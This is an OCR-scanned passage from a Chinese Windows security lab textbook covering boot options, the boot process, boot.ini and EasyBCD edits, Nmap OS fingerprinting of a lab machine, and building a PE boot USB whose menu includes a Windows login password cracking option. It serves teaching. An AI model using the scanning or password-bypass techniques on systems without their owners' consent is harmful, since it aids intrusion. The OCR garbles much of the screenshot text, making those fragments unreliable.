面 的 每 一 个 版 本 产生 了 深远 影响 。 

2001 年 ,Windows NT/Windows 2000 与 旧 的 Windows 桌面 产品 合 为 Windows XP 
(正式 名 称 为 Windows NT 5.1). 

2003 年 , Windows 2003 服务 器 (正式 名 称 为 Windows NT 5. 2) 成 为 当时 最 流行 的 服务 
器 解决 方案 。 

2007 年 ,Windows Vista( 正 式 名 称 为 Windows NT 6.0) 内 核 结构 进行 了 大 幅 改 变 。 

2009 年 ,Windows 7( 正 式 名 称 为 Windows NT 6. 1) 发 布 。 

2012 年 ,Windows 8( 正 式 名 称 为 Windows NT 6.2) 发 布 。 

未 来 将 发 布 Windows 9(NT 7.0 或 NT 6.4)。Windows 系统 的 产品 种 类 较 多 ,但 从 内 
核 角度 看 目前 只 有 两 个 版 本 , 即 NT 5 和 NT 6。 因 此 学 习 系 统 安全 开发 的 读者 从 研究 
Windows NT/Windows 2000 内 核 出 发 ,有 助 于 理解 和 掌握 Windows 的 核心 知识 (内 核 分 
析 参 见 本 书 的 实践 11) 。 图 2-3(a) 显示 了 Windows 的 内 核 文件 C:\Windows\System32\ 
ntkrnlpa. exe( 系 统 安装 在 C 盘 ) 的 属性 。 

Windows 的 内 核 文件 依据 编译 选项 的 不 同 而 编译 出 四 种 版 本 ( 源 代码 一 样 ) 。 

(1) ntoskrnl. exe; 单 处 理 器 ,不 支持 PAE( 物 理 地 址 扩展 ) ,其 属性 如 图 2-3(b) 所 示 。 

(2) ntkrnlpa. exe; 单 处 理 器 ,支持 PAE。 

(3) ntkrnlmp. exe: 多 处 理 器 ,不 支持 PAE。 

(4) ntkrpamp. exe: 多 处 理 器 ,支持 PAE. 

从 Vista 开始 ,安装 程序 统一 使 用 多 处 理 器 版 本 ,多 处 理 器 版 本 运行 在 单 处 理 器 上 只 是 
效率 稍微 低 一 些 。 不 同 版 本 的 操作 系统 不 仅 人 机 界面 (桌面 ) 有 所 不 同 ,更 为 重要 的 是 系统 
的 内 核 结 构 发 生 了 变化 ,这 也 是 同一 软件 针对 不 同系 统 有 不 同 版 本 的 主要 原因 之 一 。 由 于 
部 分 软件 特别 是 杀毒 软件 和 部 分 木马 依赖 系统 的 内 核 结构 ,因此 它们 的 安装 软件 有 系统 版 
本 的 要 求 。 另 外 不 同 的 操作 系统 具有 不 同 的 特征 和 弱点 ,因此 黑客 人 侵 前 信息 收集 ( 俗 
称 * 踩 点 ”) 的 工作 之 一 就 是 使 用 "操作 系统 探查 工具 ”准确 地 推测 目标 系统 的 特定 操作 
系统 。 

3) 启动 选项 

计算 机 上 电 启 动 后 ,不 断 按 F8 键 则 进入 Windows 系统 的 “高 级 启动 选项 ”, 如 图 2-4 所 
示 。 操 作 方法 是 由 键盘 上 的 上 下 左右 箭头 配合 回 车 键 来 完成 的 。 
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图 2-3 ”内核 文件 属性 


(1) 修复 计算 机 。 

选择 以 管理 员 账 户 登录 并 输入 密码 ,然后 进入 “系统 恢复 选项 ”界面 ,如 图 2-5 所 示 。 

O 启动 修复 : Windows 7 启动 隐藏 分 区 修复 。 

系统 还 原 : Windows 7 的 系统 还 原 可 以 在 这 里 进行 还 原 操作 ,而 Windows XP 上 则 


arti 


图 2-5 “系统 恢复 选项 ”界面 


需要 进入 Windows 选择 “还 原 ” 才 能 在 再 次 启动 的 时 候 自动 进行 还 原 操 作 , 但 是 一 旦 系统 不 
能 启动 ,还 原 操作 就 无 法 进行 。 

O 系统 映像 恢复 : 如 果 本 地 有 系统 映像 备份 会 自动 列 出 。 

@ Windows 内 存 诊 断 : 用 于 内 存 错误 检查 ,可 以 解决 内 存 的 小 问题 。 

© 命令 提示 符 : 采用 Command 方式 对 Windows 7 进行 手动 诊断 。 

(2) 安全 模式 。 

安全 模式 只 使 用 基本 文件 和 驱动 程序 。 如 鼠标 (USB 串 行 鼠标 除外 ) ,监视 器 、 键 盘 、 硬 
盘 . 基 本 视频 .默认 系统 服务 等 ,但 无 网 络 连接 。 如 果 采 用 安全 模式 也 不 能 成 功 启 动 计算 机 ， 
则 可 能 需要 使 用 恢复 控制 台 功能 来 修复 系统 。 

(3) 网 络 安全 模式 。 

网 络 安全 模式 是 在 普通 安全 模式 的 基础 上 增加 了 网 络 连接 。 但 有 些 网 络 程序 可 能 无 法 
正常 运行 ,如 MSN 等 ,还 有 很 多 自 启动 的 应 用 程序 不 会 自动 加 载 ,如 防火 墙 . 杀 毒 软件 等 。 
所 以 在 这 种 模式 下 一 定 不 要 忘记 手动 加 载 , 否 则 恶意 程序 等 可 能 会 人 侵 在 用 户 修复 计算 机 
的 过 程 中 。 

(4) 带 命令 行 提 示 符 的 安全 模式 。 

这 种 模式 只 使 用 基本 的 文件 和 驱动 程序 来 启动 ,在 登录 之 后 ,屏幕 上 显示 命令 提示 符 ， 
而 非 Windows 图 形 界面 。 需 要 说 明 的 是 ,在 这 种 模式 下 ,如 果 用 户 不 小 心 关 闭 了 命令 提示 
符 窗口 ,屏幕 会 全 黑 。 这 时 可 按 下 Ctrl 十 Alt 十 Del 键 , 调 出 “任务 管理 器 ”, 单 击 “ 新 任务 ”， 
再 在 弹出 对 话 框 的 “运行 ”后 输入 “C:\Windows\explorer. exe”, 可 马上 启动 Windows 的 图 
形 界面 ,与 上 述 三 种 安全 模式 下 的 界面 完全 相同 。 如 果 输 入 “c:\Windows\system32\cmd” 
也 能 再 次 打开 命令 提示 符 窗口 。 事 实 上 ,在 其 他 安全 模式 甚至 正常 启动 时 也 可 通过 这 种 方 
法 来 启动 命令 提示 符 窗口 。 

(5) 启用 启动 日 志 。 

以 普通 的 安全 模式 启动 ,同时 将 由 系统 加 载 (或 没有 加 载 ) 的 所 有 驱动 程序 和 服务 记录 到 
一 个 文本 文件 中 。 该 文件 命名 为 “ntbtlog. txt”, 它 位 于 “% windir%”( 默 认为 c:\windows\) 
目录 中 。 启 动 日 志 对 于 确定 系统 启动 问题 的 准确 原因 很 有 用 。 图 2-6 显示 了 文件 ntbtlog. txt 


Loaded driver Ntfs.sys 


图 2-6 ntbtlog. txt 文件 


系统 依据 注册 表 HKLM\system\CurrentControlSet\services 中 的 项 值 加 载 驱动 程序 
和 服务 ( 详 见 本 书 实践 6) ntbtlog. txt 记录 的 第 一 条 记录 即 是 加 载 了 Windows 系统 的 内 
核 模块 ntoskrnl. exe。 正 常情 况 下 ,services 中 的 项 值 包含 ntbtlog. txt 中 的 内 容 , 如 果 不 一 
致 则 services 中 的 项 值 可 能 存在 隐藏 键 值 , 即 病毒 软件 刻意 隐藏 了 部 分 键 值 。 当 然 即使 一 
臻 也 未 必 安 全 ,病毒 软件 完全 可 以 修改 或 删除 该 文本 文件 。 

(6) 启用 低 分 辩 视 频 (640X480) 。 

该 选项 利用 基本 VGA 驱动 程序 启动 。 当 安装 了 使 Windows 不 能 正常 启动 的 新 视频 
卡 驱动 程序 时 ,这 种 模式 十 分 有 用 。 事 实 上 ,不 管 以 哪 种 形式 的 安全 模式 启动 , 它 总 是 使 用 
基本 的 视频 驱动 程序 。 因 此 ,在 这 些 模式 下 ,屏幕 的 分 辩 率 为 640X480 且 不 能 改动 。 但 可 
重新 安装 驱动 程序 。 

(7) 最 后 一 次 的 正确 配置 。 

该 选项 使 用 Windows 上 一 次 关闭 时 所 保存 的 注册 表 信息 和 驱动 程序 来 启动 。 最 后 一 
次 成 功 启动 以 来 所 做 的 任何 更 改 将 丢失 。 因 此 一 般 只 在 配置 不 对 (主要 是 软件 配置 ) 的 情况 
下 , 才 使 用 最 后 一 次 正确 的 配置 。 但 是 它 不 能 解决 由 于 驱动 程序 或 文件 被 损坏 或 丢失 所 导 
致 的 问题 ( 详 见 实践 6) 。 

(8) 目录 服务 还 原 模式 。 

这 是 针对 服务 器 操作 系统 的 ,并 只 用 于 恢复 域 控 制 器 上 的 SYSVOL 目录 和 
ActiveDirectory 目录 服务 。 

(9) 调试 模式 。 

该 模式 启动 时 通过 串 行 电缆 将 调试 信息 发 送 到 另 一 台 计 算 机 。 利 用 虚拟 机 调试 操作 系 
统 有 助 于 了 解 和 掌握 Windows 系统 的 内 核 机 理 , 也 有 助 于 驱动 程序 的 编程 开发 。 


(10) 禁用 系统 失败 时 自动 重新 启动 。 

因 错 误导 臻 Windows 失败 时 ,阻止 Windows 自动 重新 启动 。 仅 当 Windows 陷入 循环 
状态 时 , 即 Windows 启动 失败 ,重新 启动 后 再 次 失败 ,使 用 此 选项 。 这 里 的 错误 一 般 是 指 蓝 
屏 等 比较 严重 的 系统 错误 。 这 个 选项 是 为 了 应 对 系统 陷 人 一 个 死 循环 的 状态 (一 错误 ,就 重 
启 , 重 启 之 后 又 错误 ,再 次 重启 ) 时 设置 的 一 个 启动 选项 。 

AD 禁用 驱动 程序 签名 强制 。 

一 般 安 装 软件 时 不 提示 签名 ,但 有 些 第 三 方 驱 动 或 者 未 经 微软 认证 的 改良 驱动 在 安装 
时 会 有 这 样 的 提示 ,可 以 单 击 * 安 装 ? 按 钮 ,不 会 出 现 问题 。 如 果 提 示 不 兼容 ,那么 则 不 能 
安装 。 

4) 计算 机 启动 过 程 

(1) 计算 机 开机 后 ,开始 启动 BIOS(Basic Input Output System, 基 本 输入 输出 系统 )， 
开始 BIOS 自 检 ,检测 系统 的 总 内 存 以 及 其 他 硬件 设备 的 现状 。 通 过 自 检 后 ,BIOS 找到 硬 
盘 上 的 主 引导 记录 MBR。 

(2) MBR(Master Boot Record ,硬盘 的 主 引导 记录 ) 位 于 硬盘 的 0 柱 面 .0 磁头 、1 扇 区 ， 
称 为 主 引导 扇 区 。MBR 开始 读 取 硬 盘 分 区 表 DPT(Disk Partition Table) ,找到 活动 分 区 ， 
再 找到 活动 分 区 中 的 分 区 引导 记录 PBR ,并 且 把 控制 权 交 给 PBR. 

(3) PBR (Partition Boot Record ,硬盘 分 区 引导 记录 ) 搜 索 活动 区 中 的 启动 管理 器 
BootMGR(Boot Manager) ,找到 后 ,PBR 把 控制 权 交 给 BootrMGR (是 Windows Vista, 
Windows 7 和 Windows 8 中 使 用 的 新 的 启动 管理 器 ,以 代替 Windows XP 中 的 启动 管理 器 
NTLDR). 

(4) BootMGR 寻找 活动 分 区 中 的 Boot 文件 夹 中 的 BCD 文件 (启动 配置 数据 Boot 
Configuration Data ,相当 于 Windows XP 里 的 Boot. ini 文件 ) 。 

(5) 找到 BCD 文件 后 ,BootMGR 首先 从 BCD 中 读 取 启动 管理 器 BootMGR 菜单 的 语 
言 版 本 信息 ,然后 再 调用 BootMGR 与 相应 语言 的 BOOTMGR. EXE. MUI (在 Boot 文件 夹 
对 应 语言 文件 夹 中 组 成 相应 语言 的 启动 菜单 ,之 后 在 显示 器 上 显示 多 操作 系统 选择 界面 。 

(6) 如 果 存 在 多 个 操作 系统 而 且 系 统 设置 的 等 待 时 间 不 是 0, 那 么 屏幕 就 显示 多 个 操作 
系统 的 选择 界面 。 如 果 没有 多 系统 ,那么 直接 进入 Windows 系统 ,不 显示 选择 界面 。 

(7) 选择 Windows 系统 后 ,BootMGR 就 会 读 取 BCD 里 Windows 系统 所 在 的 盘 里 的 
Windows\system32\Winload. exe 文件 ,并 且 将 控制 权 交 给 winload. exe, 

(8) Winload. exe 加 载 Windows 系统 内 核 、 硬 件 、 服 务 等 ,在 这 个 阶段 系统 完成 了 启动 
的 4 项 任务 。 

O 内 核 将 在 硬件 检测 时 收集 到 的 数据 写 和 注册 表 的 HKEY_LOCAL_MACHINE\ 
HARDWARE。 

© 内 核 通过 引用 HKEY _ LOCAL _ MACHINEN system \ Current 的 默认 值 复 制 
ControlSet 来 创建 Clone Control Set。Clone Control Set 配置 是 计算 机 数据 的 备份 ,不 包括 
启动 中 的 改变 ,也 不 会 被 修改 。 

© 系统 完成 初始 化 以 及 加 载 设 备 驱动 程序 :内核 初 始 化 那些 在 加 载 内 核 阶段 被 加 载 的 
底层 驱动 程序 ,然后 内 核 扫描 HKEY_LOCAL_MACHINE\system\CurrentControlSet\ 
service\ 下 start 键 值 为 1 的 设备 驱动 程序 。 这 些 设 备 驱 动 程序 在 加 载 的 时 候 便 完成 初始 
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化 ,如 果 有 错误 发 生 , 内 核 使 用 ErrorControl 键 值 来 决定 如 何 处 理 。 值 为 3 时 ,错误 标志 
危机 /关键 ,系统 初次 遇 到 错误 会 以 注册 表 键 值 LastKnownGood Control Set 重新 启动 ( 见 
实践 4) ,如 果 使 用 LastKnownGood Control Set 启动 仍然 产生 错误 ,系统 报告 启动 失败 , 错 
误 信 息 将 被 显示 ,系统 停止 启动 ; 值 为 2 时 错误 情况 为 严重 ,系统 启动 失败 并 且 以 
LastKnownGood Control Set 重新 启动 ,如 果 系 统 启动 已 经 在 使 用 LastKnownGood fÉ, € 
会 忽略 错误 并 且 继续 启动 ; 当 值 是 1 的 时 候 错误 为 普通 ,系统 会 产生 一 个 错误 信息 ,但 是 仍 
然 会 忽略 这 个 错误 并 且 继 续 启 动 ; 当 值 是 0 的 时 候 忽略 ,系统 不 会 显示 任何 错误 信息 而 继 
续 运行 。 

(O Session Manager 启动 了 Windows 高 级 子 系统 以 及 服务 ,Session Manager 启动 控制 
所 有 输入 输出 设备 以 及 访问 显示 器 的 Win32 子 系统 以 及 Winlogon 进程 ,初始 化 内 核 
aes 

(9) 加 载 桌面 等 信息 ,从 而 启动 整个 Windows 系统 。 

计算 机 启动 过 程 可 以 总 结 为 : BIOS-~>MBR-~DPT-~PBR-~Bootmgr~BCD->~ 系 统 选择 
界面 一 选择 系统 一 winload. exe 习 内核 加 载 等 一 启动 整个 系统 。 


5. 实践 操作 及 步骤 


1) 修改 系统 启动 

(1) XP 系统 。 

右 击 桌面 上 的 “计算 机 ”图 标 , 在 弹出 的 快捷 菜单 中 选择 “属性 ”弹出 “系统 属性 ”对 话 框 ， 
如 图 2-7(a) 所 示 , 选 择 “ 高 级 ”选项 卡 , 单 击 “ 设 置 " 按 钮 ,出 现 如 图 2-7(b) 所 示 的 “启动 和 故 
障 恢复 ”对 话 框 , 单 击 “ 编 辑 ” 按 钮 ,对 boot. ini 进行 编辑 。 


系统 属性 
an [umasles (30 uen] amen Ni pren 
BATASBB , ayka nua. BUREREO: 
性 能 “Microsoft Windows XP Professional” /noexecute=optin M| 
视觉 效 果 ， 处 理 器 计划 内存 使 用 ， 以 及 虚拟 内 存 
回 明示 折 作 系统 列表 的 时 间 D: 5 me 

OEREN ERRMEAMNA W: eje 
用 户 配置 文件 要 手动 编辑 局 动 先 项， 请 音 击 “ 蝙 辑 ”。 
与 登录 有 关 的 点 面 设 置 TIIM 
ORSHRARRASW 
ORRSEERO 
口 8 动 重 新 启动 

写 入 调试 信息 
可 ~ 
ser pr 

ü 


Estant D) 


e] [ = J[ ma 
(b) 


图 2-7 系统 属性 


修改 boot. ini 文件 ,设置 正常 模式 和 安全 模式 的 启动 选择 菜单 。 原 来 的 内 容 如 下 所 示 。 


[boot loader ] 

Timeout = 30 

Default = multi(0)disk(0)partition(1)\WINDOWS 

[operating systems] 

Multi(0) disk (0) rdisk (0) partition (1) \ WINDOWS = " Microsoft Windows XP professional" 


/fastdetect 
Multi(0)disk(0)rdisk(0)partition(2)\WINNT = "Windows Windows 2000 professional" 


multi(0) 表 示 磁 盘 控 制 器 ,disk(0)rdisk(0) 表 示 磁 盘 ,partition(x) 表 示 分 区 。 修 改 后 的 
内 容 如 下 所 示 。 


[boot loader] 

Timeout = 30 

Default = multi(0)disk(0)partition(1)\WINDOWS 

[operating systems] 

Multi(0)disk(0)rdisk(0)partition(1)\WINDOWS = "XP 正常 启动 " /fastdetect 

Multi(0)disk (0) rdisk(0)partition(1)\WINDOWS = "XP 安全 启动 " /safeboot: minimal /sos / 
bootlog /noguiboot 


(2) Windows 7 系统 。 
利用 EasyBCD 2. 2 工具 为 Windows 7 系统 设置 正常 模式 和 安全 模式 的 启动 选择 菜单 。 


在 “查看 设置 "里 查看 自己 计算 机 的 启动 项 情况 。“ 添 加 新 条 目 ” 的 操作 步骤 如 图 2-8 所 示 。 


2-8 EasyBCD 主 界面 


(1) 单 击 “ 添 加 新 条 目 " 按 钮 ,右边 窗口 显示 操作 系统 的 条 目 。(2) 在 Windows 的 选项 
卡 中 设置 类 型 .名 称 和 驱动 器 。(3) 单 击 “ 添 加 条 目 ” 按 钮 创建 一 个 新 的 启动 项 。 


实践 教程 


“查看 设置 "按钮 查看 系统 启动 项 ,如 图 2-9 所 示 , 这 两 个 启动 项 都 是 正常 启动 。 


EasyBCD 的 工具 箱 显示 模式 

加 概述 日 详细 (调试 模式 ) © 1 amf] 
一 一 有 一 个 项 多 入 bootloader 
ZED 
— —— s mn: 304 
E Easy6CD 引 导 设备 :CN\ 

zan 

名 称 : Windows 7 Ultimate x64 
e= aa 

驱动 器 :C\ 

Bootloader 的 路 径 : \windows\system32\winload.exe 
[Eeeesesa so O 
— | 名 称 :安全 模式 

BCD ID: tb(5fccal-3914-11e3-8ege ccaf789436f8} 
-一 一 一 fe iaaiiai 


图 2-9 查看 设置 界面 


单 击 “ 高 级 设置 "按钮 ,对 刚刚 新 建 的 “安全 模式 "启动 项 进行 调整 ,如 图 2-10 所 示 ,在 
“高 级 "选项 卡 中 选择 “安全 模式 ”, 单 击 “ 保 存 设置 "按钮 , 则 新 建 了 一 个 安全 模式 的 启动 项 ， 
当选 择 此 启动 项 进入 系统 时 ,将 进入 安全 模式 。 


2-10 ”安全 模式 设置 


保存 设置 之 后 ,重新 启动 计算 机 后 出 现 类 似 如 图 2-11 所 示 的 启动 菜单 ,菜单 的 显示 名 
称 可 以 在 EasyBCD 中 任意 设置 。 

2) 操作 系统 探查 

网 络 映射 器 Nmap(NetworkMapper) 是 一 款 开 放 源 代码 的 网 络 探测 和 安全 审核 工具 ， 
支持 在 Windows、UNIX/Linux 以 及 Mac OS 平台 下 运行 。 它 的 设计 目标 是 快速 地 扫描 大 
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型 网 络 。 以 新 颖 的 方式 使 用 原始 IP 报 文 来 发 现 网 络 上 有 哪些 主机 ,那些 主机 提供 什么 服务 
(应 用 程序 名 和 版 本 ) ,那些 服务 运行 在 什么 操作 系统 
(包括 版 本 信息 ) ,它们 使 用 什么 类 型 的 报 文 过 滤器 / 防 
火 墙 ,以 及 一 些 其 他 功能 。 系 统管 理 员 和 网 络 管理 员 
用 它 做 一 些 日 常 的 工作 ,例如 查看 整个 网 络 的 信息 , 管 
理 服 务 升级 计划 ,以 及 监视 主机 和 服务 的 运行 。 
Zenmap 是 官方 推出 的 一 款 基于 Nmap 的 安全 扫 图 2-11 Windows 启动 管理 器 
描 图 形 用 户 界面 (GUD) ,可 以 更 直观 地 使 用 Nmap 的 强 
大 功能 (安装 软件 包 : nmap-6. 46-setup. exe) 。 经 常 被 用 到 的 扫描 被 保存 成 了 预 配置 项 ,这 
使 得 重复 利用 变 得 容易 ,也 允许 互动 地 创建 命令 行 。 扫 描 的 结果 能 够 被 保存 下 来 供 后 续 分 
析 , 可 以 将 不 同 的 已 保存 下 来 的 扫描 结果 进行 对 比 以 找 出 差异 。 最 近 的 扫描 结果 会 被 保存 
在 一 个 可 搜索 的 数据 库 中 。 图 2-12 显示 了 利用 Zenmap 对 虚拟 机 的 操作 系统 (Windows 7 
系统 ,IP 地 址 为 192. 168. 0. 103) 进 行 探查 。 
= zonas wm =s 


Scan Tools Profie Help 
Target [E] Protte k| Ea 


Command: | nmap -O -v —osscamimit —osscan-guess 192 168 0.103 


|| [Hosta] Semices | [Nmap Output [Ports /Hosts [Topology [Host Detaits [Scans 
nmap -O -v —0sscan-limit —osscan-guess 192.168... |x| [Details 
MAC Address: 00:0F:13:43:06:FC (Nisca) " 
Device type: general purpose 

Running (JUST GUESSING) : Microsoft Windows Vistal 
2008 (97%) 

Aqaressive OS quesses: Microsoft Windows Vista 

(97%), Microsoft Windows Vista Enterprise (94%), 
Microsoft Windows Vista Home Basic (92%), 

Microsoft Windows Vista Home Premium (91%), F 
Microsoft Windows Server 2008 SP1 (89%), a 
Microsoft Windows Vista SPO or SP1, or Windows 
Server 2008 (89%) 

No exact OS matches for host (If you know what OS 

is running on it, see http://nmap.org/submit/ ). 


OS- Host a 
Æ 3921680403 


TCP/IP fingerprint: 
OS: SCAN (V=4. 764D=7/1340T=214CT=14CU=369584PV=Y% 


图 2-12 Zenmap 操作 系统 探查 


(1) 一 0: 启用 操作 系统 检测 ,也 可 以 使 用 一 A 来 同时 启用 操作 系统 检测 和 版 本 检测 。 

(2) 一 一 osscan-limit: 针对 指定 的 目标 进行 操作 系统 检测 ,如 果 发 现 一 个 打开 和 关闭 
的 TCP 端口 时 ,操作 系统 检测 会 更 有 效 。 采 用 这 个 选项 ,Nmap 只 对 满足 这 个 条 件 的 主机 
进行 操作 系统 检测 ,这 样 可 以 节约 时 间 , 特 别 在 使 用 一 P0 扫描 多 个 主机 时 。 这 个 选项 仅 在 
使 O 〇 或 一 A 进行 操作 系统 检测 时 起 作用 。 

(3) 一 一 osscan-guess 或 一 一 fuzzy: 推测 操作 系统 检测 结果 。 当 Nmap 无 法 确定 所 检 
测 的 操作 系统 时 ,会 尽 可 能 地 提供 最 相近 的 匹配 .Nmap 默认 进行 这 种 匹配 ,使 用 上 述 任 一 
个 选项 使 得 Nmap 的 推测 更 加 有 效 。 

图 2-12 显示 了 Zenmap 探查 结果 ,Windows 7 基本 是 继承 Vista 而 来 的 优化 精简 后 
的 版 本 ,提升 了 速度 ,减少 了 资源 的 占用 ,也 就 是 说 二 者 本 质 是 一 样 的 ,探查 结果 比较 
准确 。 


Windows 信 息 安 
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3) 虚拟 桌面 


虚拟 桌面 Desktops 是 微软 Sysinternals Suite 工具 包 中 的 一 款 软件 ,可 以 创建 最 多 4 个 
虚拟 桌面 ,使 用 任务 栏 界面 或 热 键 预览 每 个 桌面 上 的 内 容 并 在 这 些 桌面 之 间 轻 松 地 进行 切 
换 。 图 2-13(a) 显 示 Desktops 切换 设置 ,默认 的 快捷 键 为 Alt 十 1(2、3、4), 可 用 来 进行 4 个 


桌面 的 切换 。 


图 2-13(b) 显 示 了 4 个 桌面 : 无 窗口 的 桌面 ; 打开 资源 管理 器 窗口 的 桌面 ; 打开 计算 器 


窗口 的 桌面 ; 打开 网 站 窗口 的 桌面 。 
| Desktops - Sysinternals: wwsysinternalscom [E] 


Desktops v2.0 
Copyright © 2006-2012 Mark Russinovich and Bryce Cogswell 
Sysinternals — 


virtual desktops. You can switch between virtual 
AENEA EIRA ETE ATE 
or by using a hotkey. 


Specify the hotkey modifier keys and desktop specifier: 
lat 


F] Control © Number (1, 2, 3, 9) 
[F] Shift © Function (F1, F2, F3, F4) 
[E] Windows 


FRnavtonatcayatbon [J 


(a) 


图 2-13 Desktops 


4) PE 启动 盘 

PE 启动 U 盘 的 制作 步 又 如 下 。 

(1) 下 载 系统 安装 文件 ISO 或 GHO。 

(2) 下 载 并 安装 U 盘 启 动 盘 的 制作 工具 如 *U 大 
师 ”, 如 图 2-14 所 示 ,采用 默认 选项 ,选择 “一 键 制作 ” 即 
可 ,图 2-15 显示 已 经 制作 完成 后 的 U 盘 的 内 容 。 

(3) 将 文件 ISO 或 GHO 复制 到 对 应 的 目录 H:\ 
ISOS 或 H;NGHO 下 即 可 。 

(4) 设置 BIOS 的 启动 顺序 如 图 1-9 所 示 。 开 机 后 
按 住 Delete 键 (或 F2 键 ,依据 计算 机 主板 类 型 ) 进 入 主 
板 BIOS 设置 ,选择 Advanced BIOS Features (高 级 
BIOS 功能 设 定 ) ,BIOS 会 自动 检测 到 USB-HDD. 将 其 
设置 为 第 一 启动 项 , 按 Esc 键 退 回 到 BIOS 的 主 菜单 ， 
按 F10 键 保 存 并 退出 BIOS, 重 新 启动 计算 机 , 则 显示 
如 图 2-16 所 示 的 启动 界面 。 

(5) 安装 操作 系统 : 如 果 是 ISO 文件 则 选择 选项 
[10]; 如 果 是 GHO 文件 则 选择 选项 [04]。 修 复 已 经 
安装 操作 系统 如 无 法 启动 、 密 码 丢 失 、 杀 毒 等 ,选择 选 
项 [01] 进 入 PE 系统 。 也 可 以 在 前 面 的 图 1-8 所 示 中 


O sma > 软件 介绍 
大 师 C 盘 启动 盘 制 作 工 具 是 现在 最 流行 的 世 
2 且 之 一 ， 特 别 适 合 新 手 和 怕 麻 烦 | 
. E 几乎 100% 支 持 所 有 的 避 盘 一 键 制作 
持 GHO、ISO 系 统 文 件 ， 支 持原 


KTHE 支持 最新 型 主板 与 笔记 本 ， 杀 个 PE 版 本 供 选 择 


see DataTraveler 3 < 


:[usB:HDD =] 文件 系统 : 


图 2-14 吉大 师 主 界面 
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设置 ISO 文件 为 文件 夹 “ 实 践 2” 中 的 XMPE2012. ISO, 则 虚拟 机 启动 后 进入 PE 系统 ,如 
图 2-17 所 示 。 


| 大师 启动 一 (H) + 
IAM WMH 

paxsa 
ze 
VREDELA exe 
k isos 
k cHo 
b russes 
县 TI 上 


图 2-15 利用 吉大 师 制作 完成 后 的 U 盘 内 容 


【01) 运 行 U 大 捷 Win8pe 精 简 版 (适用 新 机 ) 
【02) 运行 U 大 师 Win03pe 增 强 版 (适用 者 机 ) 
【03] 以 上 PE 划 黑 屏 无 法 进入 不 认 硬盘 方案 
【04] 进 入 Ghost 备份 还 原 系统 多 合 一 菜单 
【05) 运行 Disk Genius 分 区 工具 

【06) 运行 MaxDos 工 具 箱 增强 版 菜单 

【07) 运 行 硬盘 内 存 检 测 扫 描 工 具 菜 单 

【08] 运行 Windows 登 陆 密 码 破解 菜单 
[09] 启动 U582.0 加 速 电脑 启动 (者 机 专用 ) 
(10) 启动 自 定义 ISO/IMG 文 件 (ISOS 目 录 ) 
【1 安装 原版 Win7/Win8 系 统 ( 非 GHOST 版 ) 
【12]=== 尝 试 从 本 地 硬盘 启动 === 


F9 重启 F10 关机 


小 马 PE2012 


图 2-17 PE XP 系统 
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6. 思考 题 


(1) 在 计算 机 启动 的 各 个 阶段 可 能 存在 哪些 安全 问题 ? 
(2) 利用 PE 系统 查 杀 计 算 机 病毒 有 什么 优势 ? 


1. 实践 目的 


理解 命令 提示 符 和 环境 变量 以 及 二 者 间 的 联系 ,掌握 部 分 命令 的 使 
用 方法 。 


2. 实践 环境 


连 入 Internet 的 计算 机 一 台 , 安 装 Windows XP, Windows 7 或 
Windows 8 等 操作 系统 。 


3. 名 词 解释 


(1) 命令 提示 符 : 命令 提示 符 即 cmd. exe, 是 一 个 32 位 的 命令 行程 
序 ,微软 Windows 系统 基于 Windows( 视 窗 ) 上 的 命令 解释 程序 ,类 似 于 
微软 的 DOS 操作 系统 。 

(2) 环境 变量 : 环境 变量 一 般 是 指 在 操作 系统 中 用 来 指定 操作 系统 
运行 环境 的 一 些 参数 ,例如 临时 文件 夹 位 置 和 系统 文件 夹 位 置 等 。 

(3) 目录 与 路 径 : 目录 也 称 为 文件 夹 ,实际 上 ,一 个 目录 或 文件 夹 就 
是 一 个 装 有 数字 文件 系统 的 虚拟 * 容 器”, 在 它 里 面 保存 着 一 组 文件 和 其 
他 一 些 目 录 ( 文 件 夹 )。 而 用 户 在 磁盘 上 寻找 文件 时 ,所 历经 的 目录 ( 文 
件 夹 ) 线 路 叫 路 径 。 

(4) 快捷 方式 : 快捷 方式 是 Windows 提供 的 一 种 快速 启动 程序 、 打 
开 文 件 或 文件 夹 的 方法 。 它 是 应 用 程序 的 快速 连接 。 快 捷 方式 的 一 般 
扩展 名 为 Ink, 并 且 快 捷 方 式 的 图 标 左 下 角 都 有 一 个 非常 小 的 箭头 。 双 
击 快捷 方式 就 打开 了 这 个 快捷 方式 所 指向 的 应 用 程序 。 

(5) 批 处 理 : 顾名思义 , 批 处 理 就 是 对 某 对 象 进 行 批量 的 处 理 。 而 
DOS 批 处 理 则 是 基于 DOS 命令 的 ,用 来 自动 地 批量 地 执行 DOS 命令 以 
实现 特定 操作 的 脚本 ,扩展 名 为 bat。 


4. 预备 知识 


1) 命令 解释 程序 
cmd. exe 是 微软 Windows 系统 基于 Windows( 视 窗 ) 上 的 命令 解释 
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程序 ,不 是 纯粹 的 系统 程序 ,但 是 如 果 删 除 它 ,可 能 会 导致 不 可 知 的 问题 。 文 件 位 置 为 
* :\Windows\System32\cmd. exe, 

cmd, exe 是 Windows 的 “ 标 配 ”组 件 , 它 可 以 实现 用 户 与 操作 系统 的 直接 交流 ,并 负责 
用 户 输入 的 所 有 命令 的 解释 和 支持 ,特点 是 运行 快捷 、 安 全 ,稳定 ,部 分 特殊 功能 在 图 形 界面 
下 是 没有 或 难以 完成 的 ,因此 cmd. exe 是 专业 人 士 常用 的 工具 。 

打开 方式 : 选择 “开始 ”一 “运行 ", 输 入 cmd, 单 击 “ 确 定 ” 按 钮 (Vista 或 Windows 7 的 运 
行 默认 没有 , 调 出 来 用 “开始 ”一 “属性 ”, 或 按 Win R 键 ,然后 输入 cmd, 或 选择 “开始 ”一 
“程序 ”一 “附件 ”一 “命令 提示 符 ”。cmd. exe 启动 后 默认 是 黑 底 白字 ,如 图 3-1(a) 所 示 , 可 以 
用 color 命令 修改 其 背景 或 文字 的 颜色 。cmd. exe 窗口 首先 显示 当前 系统 的 版 本 和 版 权 声 
明 , 然 后 显示 当前 默认 路 径 是 C:\Documents and SettingsS\Administrator 二 , 即 登 录用 户 账 
户 所 在 的 文件 夹 , 而 Windows 7 下 是 C;NUsersN Administrator >, cmd. exe 文件 属性 如 
图 3-1(b) 所 示 , 显 示 文 件 位 置 、 大 小 、 创 建 时 间 、 修 改 时 间 等 信息 ,如 有 不 同 则 有 可 能 存在 安 


全 问题 。 


cmd. exe 属性 


版 本 | e 


nd exe 


>: \Docunents and Settings\Adninistrator 


"m 
大 小 460 1B (471,040 FS) 
占用 空间 : 464 KB (475,138 FH) 


创建 时 间 : 2007 年 6 月 1 日 星期 五 ，0:00:00 
修改 时 间 : 2007 年 6 月 1 日 星期 五 ，0:00:00 
